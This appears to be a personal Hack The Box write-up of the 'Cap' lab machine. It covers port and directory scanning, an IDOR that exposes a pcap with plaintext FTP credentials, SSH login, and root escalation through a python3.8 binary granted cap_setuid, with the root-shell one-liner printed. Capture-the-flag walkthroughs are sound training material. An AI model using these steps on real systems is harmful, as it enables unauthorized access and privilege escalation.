HTB Cap done
Cap¶
Notes¶
OS:¶
Linux
Technology:¶
IP Address:¶
10.129.137.175
Open ports:¶
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Gunicorn
Users and pass:¶
From file called: 0.pcap
U: nathan
P: Buck3tH4TF0RM3!
---
Nmap¶
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Cap]
└─$ sudo nmap -A -sV --script=default -p- -oA 10.129.137.175_nmap 10.129.137.175 ; cat 10.129.137.175_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
[sudo] password for kali:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-03 16:09 CEST
Nmap scan report for 10.129.137.175
Host is up (0.034s latency).
Not shown: 65387 closed tcp ports (reset), 145 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
| 256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
|_ 256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open http Gunicorn
|_http-title: Security Dashboard
|_http-server-header: gunicorn
Ffuz: http://10.129.137.175/FUZZ¶
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Cap]
└─$ ffuf -u http://10.129.137.175/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=2 -o 10.129.137.175_ffuz -of all -e .php,.html,.txt,.bac,.backup,.md,.git
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.129.137.175/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Extensions : .php .html .txt .bac .backup .md .git
:: Output file : 10.129.137.175_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
capture [Status: 302, Size: 220, Words: 21, Lines: 4, Duration: 5691ms]
data [Status: 302, Size: 208, Words: 21, Lines: 4, Duration: 39ms]
ip [Status: 200, Size: 17462, Words: 7275, Lines: 355, Duration: 102ms]
netstat [Status: 200, Size: 53826, Words: 27032, Lines: 671, Duration: 59ms]
:: Progress: [163752/163752] :: Job [1/1] :: 917 req/sec :: Duration: [0:04:51] :: Errors: 0 ::
Read pcap file: 0.pcap¶
IDOR
1 Open the website http://10.129.221.239/data/0
2 Download pcap file 0.pcap
3 Read login and password to ftp
U: nathan
P: Buck3tH4TF0RM3!
---
From wireshark
___
220 (vsFTPd 3.0.3)
USER nathan
331 Please specify the password.
PASS Buck3tH4TF0RM3!
230 Login successful.
SYST
215 UNIX Type: L8
PORT 192,168,196,1,212,140
200 PORT command successful. Consider using PASV.
LIST
150 Here comes the directory listing.
226 Directory send OK.
PORT 192,168,196,1,212,141
200 PORT command successful. Consider using PASV.
LIST -al
150 Here comes the directory listing.
226 Directory send OK.
TYPE I
200 Switching to Binary mode.
PORT 192,168,196,1,212,143
200 PORT command successful. Consider using PASV.
RETR notes.txt
550 Failed to open file.
QUIT
221 Goodbye.
FTP - login user: nathan¶
U: nathan
P: Buck3tH4TF0RM3!
___
It is a home folder for user nathan, I can read all filesystem
---
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Cap]
└─$ ftp 10.129.221.239
Connected to 10.129.221.239.
220 (vsFTPd 3.0.3)
Name (10.129.221.239:kali): nathan
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -a
229 Entering Extended Passive Mode (|||32485|)
150 Here comes the directory listing.
drwxr-xr-x 3 1001 1001 4096 May 27 2021 .
drwxr-xr-x 3 0 0 4096 May 23 2021 ..
lrwxrwxrwx 1 0 0 9 May 15 2021 .bash_history -> /dev/null
-rw-r--r-- 1 1001 1001 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 1001 1001 3771 Feb 25 2020 .bashrc
drwx------ 2 1001 1001 4096 May 23 2021 .cache
-rw-r--r-- 1 1001 1001 807 Feb 25 2020 .profile
lrwxrwxrwx 1 0 0 9 May 27 2021 .viminfo -> /dev/null
-r-------- 1 1001 1001 33 Apr 04 10:01 user.txt
226 Directory send OK.
ftp>
SSH - login user: nathan¶
U: nathan
P: Buck3tH4TF0RM3!
---
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Cap]
└─$ sshpass -p 'Buck3tH4TF0RM3!' ssh [email protected]
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Fri Apr 4 10:36:18 UTC 2025
System load: 0.0
Usage of /: 36.7% of 8.73GB
Memory usage: 21%
Swap usage: 0%
Processes: 225
Users logged in: 0
IPv4 address for eth0: 10.129.221.239
IPv6 address for eth0: dead:beef::250:56ff:fe94:5320
=> There are 3 zombie processes.
* Super-optimized for small spaces - read how we shrank the memory
footprint of MicroK8s to make it the smallest full K8s around.
https://ubuntu.com/blog/microk8s-memory-optimisation
63 updates can be applied immediately.
42 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Fri Apr 4 10:35:39 2025 from 10.10.14.78
nathan@cap:~$
Read flag: user.txt¶
nathan@cap:~$ cd ~
nathan@cap:~$ ls
user.txt
nathan@cap:~$ cat user.txt
404dd01c4096fea15681f2e2b886bb60
nathan@cap:~$
Check app.py¶
nathan@cap:/var/www/html$ ls -la app.py
-rw-r--r-- 1 nathan nathan 4293 May 25 2021 app.py
nathan@cap:/var/www/html$
---
@app.route("/capture")
@limiter.limit("10 per minute")
def capture():
get_lock()
pcapid = get_appid()
increment_appid()
release_lock()
path = os.path.join(app.root_path, "upload", str(pcapid) + ".pcap")
ip = request.remote_addr
# permissions issues with gunicorn and threads. hacky solution for now.
#os.setuid(0)
#command = f"timeout 5 tcpdump -w {path} -i any host {ip}"
command = f"""python3 -c 'import os; os.setuid(0); os.system("timeout 5 tcpdump -w {path} -i any host {ip}")'"""
os.system(command)
#os.setuid(1000)
return redirect("/data/" + str(pcapid))
Check binary python¶
I found capabilities: cap_net_bind_service
---
nathan@cap:/var/www/html$ whereis python
python: /usr/bin/python3.8 /usr/bin/python3.8-config /usr/lib/python3.8 /usr/lib/python3.9 /usr/lib/python2.7 /etc/python3.8 /usr/local/lib/python3.8 /usr/include/python3.8
nathan@cap:/var/www/html$
nathan@cap:/var/www/html$ ls -la /usr/bin/python3.8
-rwxr-xr-x 1 root root 5486384 Jan 27 2021 /usr/bin/python3.8
nathan@cap:/var/www/html$
nathan@cap:/var/www/html$ getcap /usr/bin/python3.8
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
Privilege Escalation¶
Python capabilities: cap_net_bind_service¶
Linux Privilege Escalation using Capabilities
nathan@cap:/var/www/html$ getcap /usr/bin/python3.8
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
nathan@cap:/var/www/html$
nathan@cap:/var/www/html$
nathan@cap:/var/www/html$ /usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash")'
root@cap:/var/www/html#
root@cap:/var/www/html# id
uid=0(root) gid=1001(nathan) groups=1001(nathan)
Read flag: root.txt¶
root@cap:/var/www/html# cd /root/
root@cap:/root# ls -a
. .. .bash_history .bashrc .cache .local .profile .ssh .viminfo root.txt snap
root@cap:/root#
root@cap:/root# cat root.txt
2750aef9b82d3e019b5c0ac7d0ac9a69
root@cap:/root#
References¶
[Linux Privilege Escalation using Capabilities](https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/)
Lessons Learned¶
Tags¶